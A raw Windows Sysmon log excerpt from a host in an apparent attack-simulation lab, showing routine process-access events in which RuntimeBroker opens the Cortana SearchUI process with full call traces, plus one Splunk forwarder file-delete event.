08:05:37.536{466BC892-32D3-60E8-6F0B-00000000CF01}70768900C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053792Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.536{466BC892-32D3-60E8-6F0B-00000000CF01}70768900C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053791Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.536{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17f26|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a752|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a87f|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a26c|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001053790Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.518{466BC892-32D3-60E8-6F0B-00000000CF01}70769396C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053789Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.518{466BC892-32D3-60E8-6F0B-00000000CF01}70769396C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001053788Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.518{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053787Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.518{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001053786Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.518{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053785Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.518{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053784Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.410{466BC892-32D3-60E8-6F0B-00000000CF01}70762764C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+6e886|C:\Windows\System32\windows.storage.dll+701e8|C:\Windows\system32\windows.cortana.Desktop.dll+f6ca|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001053783Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.410{466BC892-32D3-60E8-6F0B-00000000CF01}70762764C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+a1970|C:\Windows\System32\windows.storage.dll+d3034|C:\Windows\System32\windows.storage.dll+d072b|C:\Windows\system32\windows.cortana.Desktop.dll+f61e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4 23542300x80000000000000001053782Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.394{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40DFB588C0C62B6BE3319200EA236406,SHA256=1DF21E1B2CCC1A554D9643089AFD827FB8B7F0EC55AF35B79890B207A6A1AE23,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053781Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.365{466BC892-32D3-60E8-6F0B-00000000CF01}70768900C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001053780Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.365{466BC892-32D3-60E8-6F0B-00000000CF01}70768900C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053779Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.365{466BC892-32D3-60E8-6F0B-00000000CF01}70768900C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053778Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.365{466BC892-32D3-60E8-6F0B-00000000CF01}70768900C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053777Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.347{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053776Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.347{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053775Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.347{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17f26|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a752|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a87f|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a26c|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001053774Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.325{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053773Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 